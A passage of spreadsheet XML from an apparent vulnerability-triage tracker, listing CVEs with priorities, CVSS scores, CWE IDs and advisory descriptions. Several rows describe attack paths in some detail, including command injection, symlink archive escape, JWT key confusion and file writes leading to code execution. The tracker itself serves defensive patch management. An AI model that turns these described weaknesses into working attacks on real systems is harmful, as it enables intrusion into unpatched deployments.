      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101260</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101261</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Ziroom ZHOME A0101 1.0.1.0. This affects an unknown part of the file /api/ZRnetwork/firstSetup_wifi. Executing a manipulation of the argument login_pwd can lead to command injection. The attack may be performed from remote. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101261</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>The decompress package for Node.js extracts archives. Prior to 10.2.2 and 11.1.4, the default decompress(input, output) API relies on lexical containment checks that do not account for the kernel following a planted symlink chain. An attacker can supply a crafted archive containing chained symlink entries so that a later entry resolves outside the output directory. This allows files outside output to be read or written, and overwriting startup scripts or configuration can lead to remote code execution. The maintained @xhmikosr/decompress package is fixed in 10.2.2 and 11.1.4, but the separately affected unmaintained decompress package remains unpatched through 4.2.1. This vulnerability results from a bypass of the incomplete hardening for CVE-2026-53486. @xhmikosr/decompress is fixed in versions 10.2.2 and 11.1.4.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101894</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102268</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>python, cryptography, go</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, is_pem_format in jwt/utils.py is affected because is_pem_format does not recognize every PEM representation accepted by the cryptography loader. This occurs when an application mixes HMAC and asymmetric algorithms and supplies a mutated public-key PEM as raw key bytes. As a result, HMACAlgorithm.prepare_key treats the unrecognized asymmetric public key as an HMAC secret. Consequently, an attacker who knows the public key can forge authenticated HMAC tokens. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102268</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101860</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in RaspAP raspap-webgui up to 3.5.5. Affected by this issue is the function PluginInstaller::addSudoers of the file src/RaspAP/Plugins/PluginInstaller.php of the component sudo Configuration. Performing a manipulation results in improper privilege management. The attack may be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101860</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12264</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Arbitrary file write via HA Failover Config sync upload leading to remote code execution.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12264</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12265</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>postgresql, gin</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central versions before 6201 are vulnerable to Insufficient access control in HA failover endpoint leading to destructive PostgreSQL database operations.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12265</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12268</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>ManageEngine DDI Central versions below 6201 are vulnerable to PowerShell command injection in Windows DNS SPF/TXT record push leading to remote code execution.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12268</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12269</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>0fc0942c-577d-436f-ae8e-945763c79b02</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-434</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Zohocorp ManageEngine DDI Central 6.2.0 build below 6201 had a Keepalived configuration injection vulnerability in the HA configuration workflow. This issue could allow an authenticated operator-level user to modify the Keepalived configuration and potentially execute commands as root on the DDI Central host.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12269</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78424</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>Improper parameter handling in NeuVector allows any authenticated user who holds the namespaced Runtime Policies (write) permission or anyone with access to NeuVector’s internal gRPC certificate key pair the ability to inject OS commands in the privileged enforcer container, which can lead to the complete compromise of the worker node. This affects NeuVector 5.4 before 5.4.11, NeuVector 5.5 before 5.5.4, NeuVector 5.6 before 5.6.2 and potentially older versions.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78424</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87741</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>The ConvertPlus plugin for WordPress is vulnerable to Deserialization of Untrusted Data in all versions up to, and including, 3.6.3 via the style parameter of the cp_display_preview_modal AJAX action. The vulnerability exists because the action's nonce guard is gated behind an isset() check and fails open when the cp_admin_page_nonce parameter is omitted entirely, no capability check is performed on the callback, and sanitize_text_field() — applied to the $style value before it is concatenated directly into a shortcode string evaluated by do_shortcode() — does not strip shortcode delimiters, allowing an attacker to inject a second, fully attacker-controlled [smile_modal] invocation that causes smile_modal_popup() to pass attacker-supplied base64-decoded bytes to maybe_unserialize() with no allowed_classes restriction. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject a PHP object.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t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87741</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88808</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>rust, suse</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-250</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified within Rancher Manager where the Fleet agent wrote resources to downstream clusters using its own cluster-admin credentials instead of the ServiceAccount pinned to the deployment. It affects multi-tenancy environments where different tenants share the same downstream clusters, for example different privileged or untrusted teams inside the same organization. This could lead to overwritten configuration files.
This issue affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, and 0.14 before 0.14.11.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88808</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100371</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, an authorization guard to Users::change_password(), was added to address a previous authorization flaw that allowed a secondary administrator (user_type=1, user_id != 1) to directly change the password of the primary administrator (user_id=1) through users/change_password/{id}. That remediation, however, protects only the direct password-change operation. It does not protect the identity attribute that password recovery actually trusts: user_email. Users::form() applies no equivalent object-level authorization check when editing the primary administrator's account, and user_email is not included in PROTECTED_FIELDS. A secondary administrator can therefore rewrite the primary administrator's email address, then drive the public password-recovery flow — which resolves the account by user_email — to receive the reset token and take over user_id=1. The result is an alternate attack path that achieves the same impact PR #1638 was intended to prevent: cross-administrator full account takeover of the primary administrator. This issue has been patched via commit 8616fa4.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100371</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54675</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-434, CWE-73</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.10 and 17.0.5, a critical vulnerability exists in the sound language upload and conversion functionality that allows an authenticated attacker to perform arbitrary file writes, leading directly to remote code execution (RCE). Authentication with a known username is required. The vulnerability stems from insufficient path sanitization in the file conversion process, enabling path traversal attacks that place malicious PHP files in the web server's root directory. This issue has been patched in versions 16.0.10 and 17.0.5.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54675</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96538</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>20be33e2-bf35-4d13-8fad-18bd2f3e3659</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr">
        <is>
          <t>postgresql, hp</t>
        </is>
      </c>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>WarehousePG (WHPG) 7.x before 7.6.0-WHPG is affected by a missing authorization vulnerability (CWE-862) in the built-in server-side file functions pg_file_write(text,text,bool), pg_file_rename(text,text,text), pg_file_unlink(text), and pg_logdir_ls(). These functions are executable by any authenticated database role with no GRANT required, because the REVOKE that contrib/adminpack applies to the equivalent functions was never carried over to WHPG core when their catalog entries were repointed to the ungated adminpack-derived implementations as part of Greenplum's merge to a PostgreSQL 12 base. A non-superuser can use pg_file_write, pg_file_rename, and pg_file_unlink to create, overwrite (append), rename, and delete files under the data and log directories, and can use pg_logdir_ls() to enumerate log file names. Because postgresql.auto.conf resides in the data directory, a non-superuser can append configuration directives such as shared_preload_libraries or archive_command to it, resulting in arbitrary code execution as the postgres operating system user on the next server restart or configuration reload. WarehousePG 6.x is not affected, as the equivalent functions there enforce a superuser check internally.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96538</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-42002</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>express, python</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
